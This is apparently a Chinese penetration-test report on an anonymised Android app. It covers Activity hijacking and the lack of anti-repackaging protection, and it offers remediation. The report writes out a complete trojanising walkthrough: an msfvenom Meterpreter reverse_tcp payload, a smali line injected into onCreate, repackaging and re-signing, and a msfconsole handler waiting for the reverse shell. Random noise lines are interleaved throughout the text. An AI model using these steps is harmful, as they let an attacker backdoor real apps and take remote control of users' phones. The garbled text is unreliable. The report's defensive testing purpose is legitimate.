/ f, T/ e; Q u) \4 ]% @+ `, F# [; T% Z1 O
% V% _$ d# k( {$ G# [3 l; g. w/ e6 m( }+ N0 A5 C- }! F+ [
+ M0 k+ o- R% x" G
1 t1 |% ?; E0 ~$ K$ \2 y; l
) m2 i$ z; ~1 d. w5 `* V
# \) E1 N2 p6 \! O0 ]. ~8 g* U/ ~ ( d9 J% s- |% K" j4 z8 t8 \
" F$ a# y1 M e+ Y& b" ^
2 检测结果
% B* j4 X4 J) U
$ B4 i( ^1 @1 Y/ d
1 B5 z R3 N% m8 ^8 p: |' ]2 E
9 t9 X$ Q' z# g3 A2 ?( b
: F @# Y% m9 O7 g/ ]
, T4 h4 T/ l+ y- L- G, ? 2.1 某某某 ) x( z/ U, O5 L6 V0 ]
: l# m ]* H, K) k
+ x# K/ e4 K' o$ e
! q" w! a: B6 R. V, ^( d
. g4 Z% P2 v- h8 D' c6 Q' `9 {+ H5 o0 u
2.1.1检测目标 " V& [7 T1 j" ~/ D6 s* l& t; |$ w
4 Q: k& ^% c: X! z
: s/ l$ ]& G: A) _1 M' G
& u$ o# u3 V1 W
* L# x8 c8 c& K% Y/ ~
' y- o) y' j/ c# A" Q0 n0 _" A
目标地址: 某某某某某某APP + ~! r1 Q- Q# n4 i
. R- q9 a7 K2 E( _2 q
* X+ E5 V" {8 h6 i, x# k3 g3 m+ w1 _
8 `8 q0 @: X' b: p0 [7 j, \& h9 ~/ o* M& J
2.1.2检测结果 / k8 \" I! T7 a5 M5 I2 Y
9 u: G, B! x ~# |# n+ g
1 m# q' P" k( q$ M# n
" p: F) J+ x- t
* N! [6 O# U F0 `0 n5 Y. q6 }) j1 f) n C
2.1.2.1
2 Y; E+ H5 c& M B- B0 X/ ?, \; k2 \" E2 f0 G
" j" E' B; C- x$ j& p( w! B2 }3 l) a) G4 L2 b
: g$ J& A/ U5 e9 Y W& K/ o' Q% I D4 k
0 {7 D1 F% U1 ~3 X2 [" H7 N 漏洞链接地址:某某某某某某APP
. {% O: m( C) R; Q( y) B( E+ {" \# L+ c7 {6 x0 R
$ Y, j0 M$ O: e( s2 |. K" B
; J$ e& m1 E2 ?% T: F4 y / t- \0 H8 @/ B
* n! r3 K d* x) D& _ T( ?
. S# ]1 D7 c7 m O6 H* N9 z* s1 ^ v; \) N5 F, Z+ M
8 a6 _* N- v4 T# K0 D
7 v* A3 s4 j+ e
' I& b0 q( L" B0 n' _+ s5 L9 J
9 N- _! ]0 ^6 p0 z7 V; Z3 v
漏洞分析及取证: & g7 a* x4 ?( p! J- O% X2 P
2 _# l$ H0 \/ L
( p9 d$ ]# P8 Z0 l! | ]# ?$ t! k
; w; k5 o' j2 S4 n4 g
1 F3 F6 H4 b8 K$ r: H7 i) p6 R" ?
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 6 i, i f- p* H. Q/ c$ p) R& U) b
& Z6 c. h. d" _$ F t. E+ S
* p- V/ W* s9 O
! X5 i' u0 q7 A3 W3 k3 j$ m
) A7 E( {7 z% X O4 I& g0 A
8 t/ G& p/ @' E" `# t: `, |8 Y* ?
' `% z% G" W# h+ S2 k
- Z% s W/ A& T& l/ r8 G2 t
4 ^- q2 ^7 d4 |; V
0 o( r* r; V% g
) ?, n9 n6 u5 i* P
! n7 ]3 \5 V$ [/ u4 ^
/ x: S- i6 ?' M2 {
; p2 m0 ~7 V. _" R
/ ?5 t J) V6 d5 H
. r9 X) R+ q) C# ^8 ~7 h 4 R, W# G& t# N M0 ]" r1 v, M
* N* a' ]* b4 c0 f; A G
. @) a4 S' A6 y# ?* ~) K9 j% w2 x! A+ r2 \2 _ ~4 [ o
" z/ y5 H9 H, `1 J& ^
: c8 V/ q/ d4 K& n 3 @7 @0 D, G% K1 G. Y
+ A& ^% X1 A1 L5 q% Z
. V& O" w9 F; z/ d0 z7 @% a* l7 G1 g i
/ z! K- v: Z6 ?! L' i0 a8 K
: f# j1 Z, b2 ~* z: z/ v% c0 h3 Y# F: t
2 b: M5 p# I6 Y+ ?
' q) M* F% G2 V2 |
% W4 W( A4 ^+ x( G/ j% ~2 f4 R, E! f& z$ N9 f$ o+ X- k
( s& i9 p9 f) X4 R1 h
0 s& x& \$ b1 b% c& N9 _ + C' x" G, p. c/ x9 K
: e* P6 x$ q6 E0 h4 x! r
漏洞危害:高 & s0 @$ j* q3 d! G4 `
7 N& t9 m7 I1 j
! q* _+ h+ z7 z9 L, x% r( x8 k" p ?9 D0 Q4 P: \% r
$ {/ A8 ?, P% u1 V0 ~% G. X( t, S9 G4 S( { @
" T# D0 K) p& C; g/ p; ?3 S: i
% F9 Q, |8 W" K! _) y5 X 2 m3 N8 u7 R2 Z# V
3 C# {! @% d* T1 V9 R! w
$ \) }' P" M/ C5 G% \7 y/ _
2 d# r7 J3 J3 c6 A | , G* {/ x2 f3 m% H+ h& |
" ]0 {8 z$ v& g8 q# ]$ } ) |+ g1 J5 V$ z& g& \3 w. w
2 N/ Z8 f+ R, ~! L0 M- m 严重程度
9 A( t5 u: ~. t- d! e7 s! A6 [- ?6 t2 Y
, g0 @/ a9 l0 N" M- J& ~- V
4 }8 s+ J: {6 P& ?; e |
A1 g3 W) q$ d6 ^! @$ @! n! v* C0 Q% j1 {6 \( o5 b) w' H
8 B/ } }# T, @3 R( U, K( g
6 {, l8 L% K% E% i
) X; [: t" o- i2 c* O$ {' S9 O
# N+ v$ B6 x7 a7 ?+ V
高
& x N$ f: Y! B. d2 @1 {
; [" |. o( G( y+ }& ^
5 f' w9 x, s( X- v! p4 J. c+ g
| ! Y# b* a* B: r; K! s
9 P; U; L; ` M# g) q8 }9 y O: F0 h2 w3 Z7 w1 F
# i3 `. U: O5 \& F7 U0 M/ p( o- q
# r" i- Z7 M9 [) l$ n$ Q
# B$ X+ o. Z1 L7 n; N# q ■ * M# @: x3 f- [
8 h+ m' Y7 x& O- H3 R
8 I; k# [) R' c8 k0 X9 q. Z
. e2 a0 H: C8 ^. W |
/ x1 u# W- r1 ?1 R3 a8 m4 G \! B
! C0 Q! K+ w* O
8 n& j/ Y) ~3 y0 I( `9 O1 g0 e
4 Z. P) q0 ~$ m$ z
! H8 X! q; v2 x, l5 `2 s6 L T9 I1 t4 H
中 0 W2 [0 f. W* R% f" h. t
3 d& `4 R5 b& }) T1 |0 s+ \
. P- R% r: F# X
9 |& }* l" V% P) E4 {6 U0 i
|
4 A1 X) j/ s9 Q0 M0 \: w' R3 S$ q! u' G+ z* M( ?- e7 b
5 O: ~" z6 T p" ~4 M- p
7 K0 s# e5 A+ E7 T8 ~ ; E3 A E6 _( j3 D; h& ?* F8 l7 ]% A
" S: a1 I; T" i$ ?' J- O4 S; w
6 F3 `" h6 j) _" k( R: Z& f$ a3 c
3 s2 j+ _0 \* V$ q/ t' K0 ?8 O
% B. D' W+ W1 V" W# m |
+ N5 V; ~3 i/ A* H# o
: k3 f8 J" Z; a9 v( [5 T$ U 3 p; i0 |2 b; e; z5 _8 g6 k6 [
; d6 H3 w/ I8 K
* o1 y0 r7 S9 S5 q$ \7 L
" r n' O/ ]) X2 A% I7 p
低 6 z6 _. P: {0 f+ z/ `
! Z$ O) a% b" t3 F# O0 T7 ?
+ ]' t2 l4 i" e+ }6 b9 u$ P i3 u$ E
|
% H& C+ t& _! J8 R' N( U2 B& T: ]' Q/ M" A; U! Y
3 q7 p, P; |! v0 B% Q9 L
$ \- ]. r/ V9 t' y; y7 C# B6 b ) g0 @: s8 \# y- w G6 n
Q, [* m7 L2 q5 n. ^" ^& | 2 f3 s0 B6 v. i8 U2 q
L7 o% r" S! k, V& W
- J. Z" X2 T# [# L3 x$ i! k7 `+ P- l9 R9 j% Z' v, s# y' P3 ?
|
$ h: ]$ B3 _) C6 z7 ]1 U
+ k% d% ^9 h; N4 V5 M' N3 Q) ^
3 |3 v6 ~4 M+ a1 V" N' H
8 p. K; [8 @$ b! l3 [4 Q+ W/ E3 s7 A 6 Z* ?; [- _6 d2 |) k
) E0 c2 w9 x3 Y7 i0 M' y* J" r7 W% W
3 G" S( j3 [! H$ e k6 o
2 E {. q6 X8 o' q* S3 k
9 _. P- [) j. U+ h0 ?1 U8 z, S% y( }3 N- H$ X
( W3 j- l, R9 a; Z
$ I2 H' j1 V1 Z; f T
0 G* N3 _8 u6 U1 G
+ i# Y5 l6 }2 b9 _+ s, Q' n( }
& g3 c) }" C7 H* `
7 p+ v; X) s2 j: l M- u ' p/ }6 }5 d' t( o/ e. r
' n' l1 W5 P) K% R
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
3 S; q" q9 k: z, F e& \" C* B% F5 A- N' Y b! K5 p3 T7 D
' F0 z& t( S4 n6 c0 d" m
8 \- r# V9 o$ T6 h: T, ?, ` 7 x) w' Q, ]( Y
+ U. P3 J* e) a
& A& n) U- i& Z# d- y6 F4 U
) Q) v% [+ F8 n- I9 @) D% ]
4 H1 ]4 p; ], B* W# U( z- G F( I
5 M/ K7 H) p0 V+ ?$ f$ b
: s& r5 T% I) l% H# [- b. r% C% ^$ N3 s
* ~0 L% V( ^' @% a* H3 [) @0 K; J0 w: V0 {, |" u
/ {. u( H5 a/ \5 S* u+ Q
- Y* G# M- V$ q* d' t0 E
" j6 M) e6 D5 `8 z- B# |0 D; s" ?4 y0 E p7 H2 O- G
2.1.2.2 P2 M& N8 A4 ]* ` n! W) s
1 p: [+ F& o0 e/ h8 ^9 X
4 k& J/ e) O" X
3 v) Y8 T8 W# ~" I- f* ]/ {
+ l8 T& z) y$ S$ m
E4 |1 g2 M9 [ 漏洞链接地址:某某某某某某APP 6 K" V; g" Y$ Z+ C( b( T P
2 e, k. c& Y; o$ K1 W
& I* m: e3 g- V$ k! | ^: P
" {& V9 k' Z5 h3 t
/ I+ o8 c# U$ q8 _+ H/ E
+ I$ G4 R8 a% m9 o6 t1 x) E 漏洞分析及取证:
8 f$ e- L( U; N& i$ k2 W5 i z
, m2 G5 h& N. E w' v5 ?1 V
% R- ]$ u2 T/ i- v3 y) y# J( S
) @8 y/ m" B: e+ D. @6 o
9 z1 O- [. v" j0 E ^8 M" c3 D! p5 g" }+ f4 X# p4 Y
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
$ C! M" T: a. ?0 r. [* `4 s5 g8 W y! [' J$ i6 F6 o
7 \ [3 K n7 L" j1 N
0 p2 O7 B( A8 a4 q: d * i* Z6 { s3 g. a# B% c9 J
. u, j# B7 C+ o' r. c' n
用Metasploit 生成木马 apk
: I: c8 R; h$ _4 S0 r9 K R$ y. W0 Z
! Z: P2 Y- G ?" V
4 Z% Y; c/ n# V/ q' D4 t% s9 m
; I. G2 R4 t2 R1 k/ Q
9 \0 w1 O/ F& l msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
: q$ N0 p S* L h; x3 D; _* Z3 n1 S( v7 q4 B- Y- h% J# z
9 s1 I7 x M3 S% E* V8 _" ]$ l
" W; |7 O( [3 h6 U1 X" `- u5 `
$ n0 m- H+ C2 \, W7 H/ o/ s5 F- ^6 F8 q; o' f
反编译目标apk和木马apk ) Y% u' M; G. L; |8 w
$ C9 O; s8 `3 r6 s. {, X9 `" E
, e6 }' N3 _/ m, E
4 l1 i& k7 R" ~' i( L& e : a4 }. k$ [ _& ~
+ m8 e: k( M; r6 i
apktool d target.apk
7 g/ f; F D- n `6 S0 t
; {1 V/ a f O apktool d cockhorse.apk & G, U8 [4 s9 u( W+ B
/ ]6 \8 z/ B' v/ p1 }8 d6 c8 I
0 u6 c, a6 W7 q& n2 {8 v
$ F% _# T/ V/ H+ L" A
5 ]" o: ^, C3 _- O6 }; c6 J6 W, r" d' o5 o$ L
木马 apk 注入目标 apk 0 E, F; J/ c4 ^2 l7 S0 Q. m7 `
& f% j! Y1 g7 ~/ t. p9 ]7 f
% Y0 i3 l0 K6 u' e5 N6 \, B( K
: `: ^% x) l# E1 H) t# s! e
" h9 P S/ D }* Y9 v9 c" E
: A# b9 ~* o# c1 G4 c8 i0 I" t 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
4 Y. @8 s3 c( x2 C. f# L' u% w/ I7 u
! r$ x' u4 e: t. A; E9 i9 S- W! s2 z( x8 [ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 9 C6 _0 t; b& V* F6 t
7 ?5 A6 Q4 P9 n0 k( U2 p3 I/ x2 L
& E$ [5 f0 d0 w% Q5 p. Y+ X3 r( g: I1 Q* i
7 c) \$ N! _; Z0 ?6 F
) `/ b- T8 M: j5 j0 j3 ^ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
' U* \: y( T0 E) I. |/ w: I0 \2 B* i, M* g+ n6 K" @
8 {7 C# t6 |+ P7 b1 G' Y6 l' K
: ]. P- j y5 w6 ?. o) x! C : K1 l( ~, N) A, v
4 e) d5 r/ U( u. {" K7 n 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
: H! p% g& l: W) j5 h
" F( a# O( H, V% j2 @
4 J+ U5 I, ?. H7 @
) h4 {4 Q3 p) K8 o" q7 d% P
9 T, s0 Q/ K* `$ n. N& {* p$ @7 X1 ^/ c3 H, c
回编译生成最终 apk
- z; u& O$ ?) a; C/ h( p
2 A' J' ]% T) O. r6 a
8 \/ N& B4 B/ Y* I& _: I0 m, m) i' M0 m* Y+ H* ^
e0 K5 X C! c7 n I; l# I; C: F- b
重新打包
+ ~/ Z* v/ ^" {( C- v
/ |, m. x3 n8 N4 }9 V5 P' x
! s/ x: c/ |; V2 u+ ~" j
/ ?2 r5 P& `! m/ S# Z
. d; I# P0 G6 W9 y
% \( O: v. ^4 h0 E apktool b -o repackage.apk target_app_floder ) R7 Y1 z5 L( x
3 |) M* v! O! O9 @2 y, s
6 q' X: E. Q# u: p- X7 j$ @
" R# L) {4 y6 H
8 T' h7 R# u0 x$ P( l
% h* S' V; ^1 F1 Y+ G 创建签名文件,有的话可忽略此步骤 4 K& W% j, l* R9 t& e
- Q' o r& N( C- T0 T
! |3 S5 k" {( ~
4 h6 \# ?" X( O( G+ U0 B) \
' p" f4 v, l+ `
$ g# R' t2 i! R; x1 J8 T keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
4 F) v' x0 t9 w6 Y: i
% P6 Y, o& K( C1 y8 @
1 v9 s9 D/ ^5 P- ]5 w) [$ l
) ]( w0 N( l* Q* k
5 y' [. p' M& r! z$ U$ H ?
1 z, t) J/ F& {8 {" E
签名,以下任选其一 / T0 I' \, L4 W6 m! _. f& X
4 `) A6 W' q5 a
8 n( U* W4 _/ V& g: Q' S6 \
& T1 q/ v7 S5 ^0 @4 o
% u' i9 w& f) @/ m8 i" ?! z: A* T8 o. W* i# w0 B; ?6 _
jarsigner 方式
; k( A, q1 |. }: M* j! E5 R2 z7 ~1 P% U! M" p- E0 J
' X2 N1 H- |0 N; j" @& T8 @( X- t5 F4 {9 ]5 x
0 F- k [* P& ?; k2 {# a z
E/ C; c, \; j! V8 M6 f
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : g( ^& W7 ^1 m( H1 A
! K, i( Y$ e9 G/ g% k' E
4 h% y: O+ W4 R, [) s
: ^8 `- A; J" a* Z- B $ j. P. w! P$ F! h; m
* f; P9 S3 w* F& t& |" } apksigner 方式 / @0 |! |' l, r+ ]. D
6 K3 l: {" o" @0 M" E
0 o5 ?6 U7 ^1 P7 t2 k% a
+ G. p* e+ O( b6 A7 m- H) k J* q
! ~0 g: Q! i% V5 B8 K- ^9 N
' y: f6 ?. `1 l" ` apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
1 g4 Q c! g, `* u; O! @4 C1 q; ]5 E
3 {# h9 k% d$ y8 Y& {
1 Y+ V0 Q7 B) y3 \" U. ^* o* H6 ~% e% V* N, Q. I0 C2 h' |8 D& f
: K5 |3 I$ a% N
/ O M- S: L* ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false
2 u/ r1 a0 D9 |' \5 e+ D) P/ v9 S3 j# S6 g3 ]/ I/ D
2 s. B: g. J, B4 h! q0 }, f7 k' M
8 w0 X* t, u! K( b
3 B# i2 D1 w# I: x0 l
$ C9 f, N/ [5 X4 _* W8 ] 验证,以下任选其一 , Z- [ w8 Q, `- M" V( r
% v) V) Y3 |; C1 H+ r5 h; z
) A/ `/ k# T ~, R$ l/ V
7 r% G Z& u% k& O. Q
: {/ Q9 o( o: O4 K: }3 Q" o! B
?' N; C3 I- E! ~ {7 \- { jarsigner方式
, s. g2 p' k, m" N
& t9 n3 M+ T4 T U9 B
4 i, y% c! Y$ f0 ~$ A
) I2 @# {& P+ h/ m I8 P& ~! ^ ?
" Y$ {2 b; _, z/ X3 }3 k( h# { B4 l0 }* ?( A5 v* b& h `% S5 l
jarsigner -verify repackaged.apk : F1 F; H" M7 l) k6 ?$ _$ Q
4 h' S, i9 J- T/ G' t6 q
, K% v! |! g# E9 O* O4 N7 R. N- r
9 p5 a$ ]! B& K' s: T
3 j, i& ]9 Z: D% O- e1 f) F/ V$ P; x; O' U3 o g7 i4 \) y
apksigner 方式 * }# t1 ~- D. F" z' S! n
/ z# R" j* ^9 P0 D. f/ `0 Q) Z+ I
. z% a$ c+ d/ |+ F/ k2 @
k4 J$ X! a' y, _
4 }" N3 {. ]1 E
- R1 f7 J& f7 P apksigner verify -v --print-certs repackaged.apk
, @9 \. y, W" |% e" y! J. p, m. p6 p4 q- Y5 Q
4 Y+ U# g; l+ n: g
c; K5 Z( c+ X* X3 L1 V
3 ^0 U, J! o0 v5 A; `; o# K3 q8 W0 e0 q9 ~5 m
keytool方式
& Q0 w3 u# |7 t" S% d9 l8 f
6 p3 K& _/ C5 o6 a; |1 E, }8 f
$ H3 P2 i v' b# \
5 u; H" [$ }* c3 Y
1 P' B9 {% }9 P- x# K6 Y. @, m8 A
% U% X: C' U! S) n/ p, S keytool -printcert -jarfile repackaged.apk
8 p/ H# U( h* _- D
9 G7 _4 N M# H' ]
( t, W, i* f# D
* f" M2 K" Y( ^# E+ E t
/ X' B/ E, K0 }
7 n' `4 j: C. e! M7 c$ h; B 对齐 9 Y G& r% |% R
+ ], q( P( ?& x) J- {
! N+ P* }. s+ |. K) m0 L' B, r. @7 W, U- ^3 d
( R% ]6 @# u: o7 A
2 Y: p2 w8 k5 R* k. l 字节对齐优化
% j( W) x; g' b% u" ~1 u3 [% f$ o( n
! _9 Z1 D3 ]6 w+ U9 Q% D; h1 \1 @& p
1 o; ]6 G) \: K j$ P/ |" X5 l0 q % z- T# e7 e* e/ ^# v' u
* f) D t0 o" K6 n
zipalign -v 4 repackaged.apk final.apk
1 j1 Q. G8 ^) c1 b% U5 n; X1 V; B! s3 F) G: X0 ^& L
" F' Z6 p4 M; V1 x7 [0 s+ g
$ A, I! G$ ` W
7 |) W$ ~/ z9 W5 V6 M: q1 ^
: N" @7 t' w, E' e- t% b. K 检查是否对齐
% E6 t" Q4 ?' R
7 Q# G2 x% M, h5 {" e* |" o
: f) I( B2 O+ P* O3 Q
' L7 H$ [* O# ?" D
0 X; U* ]% H, Q0 j
8 |# O" H0 F& R) {) k+ g$ o zipalign -c -v 4 final.apk
4 |8 F R' O7 N& ?" A; \- G9 K* d: R: x, L$ H! E% K/ _! I" K0 x
. S# s8 J$ ^ Q
$ b/ ?$ n8 p3 f5 c3 ^$ i- C
; R. H% o# S4 S" v
) _' o5 {9 y. m# h1 r3 H F) [1 b0 G 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
3 Y# P9 b5 |9 b5 J/ o i0 I# F" u+ A; `) j5 o5 J
% W& l8 Q- x# `; b" w2 j6 e6 Q6 T7 I
! R. p4 b6 X' Z+ c$ y. [7 j$ |
; J* Q p& d2 v9 {4 T# v7 t# Q 启动Metasploit控制台,配置参数等待上线
; H* a9 t/ o# J) x2 w
1 A7 y# I! H1 b( ~9 M; [
4 W& T+ h& `* d5 w D; o
, ^2 v+ Q4 h) U2 v- `% z- G' C
" V9 U6 L1 B+ K/ F% K( l8 {& G* m
在终端依次输入如下命令
! o& y# I7 `# `1 [. P6 m4 c/ R/ F- K9 B& z0 {" d
+ K1 p, v/ \7 @' {2 N6 f* c3 U. Q. d/ X6 D$ T: |7 u9 E: k% i
4 `8 y9 f9 r4 p# \8 K) u3 P1 E
' S' V' O- g5 F' u" B* i msfconsole
, h, l9 Q& E. S- \1 b* w2 E" z' }% l8 A6 l) O) e; R: k
, j5 ^4 Z, R7 B% q8 r% _
k5 Y- H$ E3 h, o/ [0 O 8 [9 X" W. }9 m
) ]9 L) U) Z \: G t
use exploit/multi/handler % |6 S9 u( @9 e9 \ F3 g5 E
0 L& K: b9 ^ y0 q
( F Q# m' m. J1 J& x8 x
+ r/ F9 W2 h) Y, Y) a/ L$ I* w" r! c / w, V/ w$ k. k3 _5 V) f
3 O2 t6 ^" E/ \0 f2 R/ J4 q set PAYLOAD android/meterpreter/reverse_tcp
0 I1 R9 L% ~* k0 v5 O$ ^, V' U6 S& [( c
8 Q. [' i, ?% c! F' n: G4 P7 F
. m) K2 J. C7 \1 m 3 T6 B6 k% W' }1 T6 b, E4 V2 ?+ p
+ h3 T2 U$ `+ p$ | E( U* K
set LHOST 192.xxx.xx.xx
2 T. L8 B7 A6 s9 Q" Y# I7 Z
# ]( Q' e! d1 N! H1 `4 P* K
6 _; B8 k: j* N' }
6 U+ b5 _9 @+ u) i; m" b/ P6 G 1 Q3 h* i+ y* P. h8 Z K
, G0 y- n6 |1 l' u3 P: w3 T5 ]
set LPORT 4444 ( n0 s/ M/ \ T! Y. P
. @/ a$ c% T+ W9 U0 ]0 O, u
* X. V9 T! p4 g
5 c$ Q9 t$ a7 J6 Q6 g - D; t& k$ _3 g; K4 Y% J" L
; r% z& {0 F' y) k
exploit
" Y) ?* E1 j4 n% R y u* {* j) A5 l9 U
7 s& ]/ B1 s; }
% S1 c1 u4 O7 Q: u: n) I+ U, U: q : Q0 A( m# [# @
) w, Q+ T' e9 J0 [% E& o2 a7 ? 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
; j2 R l% S% V$ h4 ?, c* q
8 x* l2 i, ]& h, t7 m+ F; X; f
" h0 c8 P% H1 D
8 d/ Y& ]7 O- [+ L3 i" \8 X& ^ ) }/ g9 I. x' V/ b; J3 i
8 ]( D, v8 r& K$ d& p/ e
漏洞危害:中 # s4 e% D$ h7 @$ x4 x) A
; J+ ^4 O( W+ @' t, E9 i0 {
" k' L0 h, x% X" `/ B
0 D$ ?( t3 y7 P2 c
1 ~- K: [6 B4 |* ^% T" T6 S7 }
& ]% X P! N& Y5 @
' D( Y+ t* v& ?: q+ Q9 g
; H. I# u' p3 U! N$ W 5 Q! Y# O2 l9 S9 T9 c; ^8 I0 [* C+ f
& {% {5 m1 }7 d6 m4 A5 D
; f2 o2 K ^+ h
; m. e- j, G& N; U6 A3 T3 i" T 8 |, O) @. s0 b! y; t1 i. X
. j3 G3 v! Y3 X5 a: o- P$ } |
. s. B8 `6 U; a! q
/ b3 T) V7 [! S: X. N h
! e F. ]& M7 ]7 A/ I' M, t1 K3 ]4 Y/ L
严重程度
5 E6 @, ?- P, h. o2 l. n1 |) j9 H1 `1 ]9 B7 q, @0 J2 p! \
7 H) ^7 I3 _7 `6 f/ j; I
7 d/ e+ r6 x1 |9 |0 M
| 1 W8 W3 F) @" R) P2 E
+ b$ H$ ^3 P& m" U
Z% z' @% O) a
. b8 n, a: r. [- o' R$ R& B, k% ]
t% x7 U' u( L1 l0 @7 u" a
3 c' Y, g$ E! ~4 N 高
7 y3 z; ]+ d; e3 H' j9 I: X+ H2 D4 n" Q7 B% C! r" O( u
8 v& Y! e) J% O. z; L6 `. e3 v, T2 {6 W$ @6 `6 Z) `
|
- U9 H2 u3 ^4 V7 n& J" d. v
7 i& {0 S! }# l. {8 A1 t , i; v8 p) V2 i- r
) P" k& @" K2 U8 [( b. X9 m
: b6 l P$ t9 {) s* ?4 I+ `6 q- P% l* A
■ 2 p- i0 Q' }! F2 ~8 Q
4 R3 ?$ ]9 y" E, i2 O1 D0 M
( e6 v. B! z8 T* ]. j6 @7 |; q- ?8 L" }! Z \2 y1 J* C3 S
|
- P# z9 r2 ^" h- Y, ~+ d
( G6 i+ m X4 R3 t* L % F }, n6 k1 q9 I
$ }4 q C& z4 L
0 b% {3 x) V4 f
\0 \. F. e: U7 Z5 m, A
中 ; b( k8 l" O% A! d0 `
8 D9 \$ G4 y3 f9 R4 L V1 F4 R: U3 B3 c, J# T! l
7 [ z4 Q5 w, L |
e+ ^6 C9 B0 C# h- h
6 F" X, {, i0 F' f$ Q; z
; y7 U6 z6 r Z5 B
* F& U: L" X1 \$ w T0 @& F. x, e. R5 ~* G
R/ {) ~- P' }! ]1 T
$ a9 S1 v' v9 t( b4 n( X- O8 N3 D3 N3 X. \
2 o5 _( i; f7 [8 p3 u$ h/ e+ |: W" g. p3 |+ H" O7 W$ a2 N9 c* e6 g+ J! O6 W
' |1 H8 {' n8 J/ v6 O3 O6 u
! J3 p5 t" l" [ |
3 J' A5 J" G' r5 u4 p2 ?
5 ?* _/ a2 a4 d. i4 p7 w, G5 ^
7 w! k7 Z. C0 r9 x- k
, N. r4 ?8 B! u. q& J* B$ M
, y1 w$ h: v' N' A( `9 o" {: I/ u, |) J" C; \2 |
低
" I8 I$ O. Z: K5 y3 B D U% E: q, V9 S& K) R
% Y% ]) c8 b& \* l4 c3 \
6 X: u" A* e6 W' ], R, s* Y* j- ]
|
; S# B/ G& D- _! F' `6 E
- l y4 l+ T3 r G! L# U3 ]' d & P3 P# ]+ b& {+ M$ q# P. q
8 y' R2 K- D5 D) u+ r6 P! d% U 6 U' k7 F# U9 |
" c3 c/ \1 J8 T# w9 ?* b# x $ k, r1 f! a4 c2 X2 i1 c
0 E7 R, B7 o+ [: S- c6 i1 F
3 ~7 o( I0 I# b+ N! y
! k& r+ z6 D: c+ V/ F5 ? - g! K6 B9 c! \+ m' q
( B; e2 W8 w$ ] |
{( U% i" @. C7 ?
' t a) z' L- b
( d/ X- m' y4 l2 H
" [4 q& Q3 s8 @* B8 n1 i % y6 F* j8 {( j& a
% \5 V" L9 e, i, N9 ~
, A+ b8 V. o0 q3 ?2 Z
, w3 X3 a5 Z8 P* A% M. f . H6 @- e5 u* u D
: C* h v9 w, \& C g
) ]* Y1 p: D: _5 t7 X% _8 a4 e' B0 n3 Y; ?1 P V) x
; Y/ S9 E( ?; }( A4 C
% h, `5 E; F1 T
& k0 a8 h" W5 x7 L! R4 q& x2 V( ?* G
5 h8 J" ~3 P) \, s! b
7 }9 t9 K5 I$ h m/ O$ h C 修复方法: 1 ^* o) c" b+ F7 V% g) W
" M8 v! n1 k$ r' F, r7 f* V
- ~* Q: M0 T# m8 N K1 F; O9 l5 Q! C. c; D+ {
3 n. T) {' Q9 m R4 \2 v
8 L0 X- f, t& j# m& ~0 }: `* q6 v
1.在 APP 启动时应做签名校验防止二次打包。
# c5 l$ h- C$ G/ A0 s" V
% t% z" E" w+ ~6 K) G 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
8 e* I- O/ L4 E) ^; ?7 B- [: U0 @/ z' k$ [6 ]; Y
/ t: y& u0 i1 r- q) X
1 u7 d) q/ M+ e1 U# b/ }! H
9 `0 o/ t( w: V7 U) L6 v% `9 L
' D) }( d5 G. U. U( V( X9 d
3 Q2 k: R$ o w, [5 w+ T" W: q& K5 p- ^2 U" z6 z
$ B( e! W/ e! c
1 I% l( D& l2 |' E, H
$ J) C* e4 ~( E' x1 ? F* `( B# B
1 W! @8 z) D( \* B
* s# n- k& x. {7 W/ U k6 E' D% _
) r* o. a% I2 m3 c( Z' _2 ?
) V4 R- [) Q8 I% \/ W P- b. z5 I! w8 a# m5 I* }6 X$ i
2 S% K% p+ i. U; j* x! o
- O+ A1 M& h! a6 e6 k
/ w1 l+ j! P1 i
7 s& _, {& F6 C3 s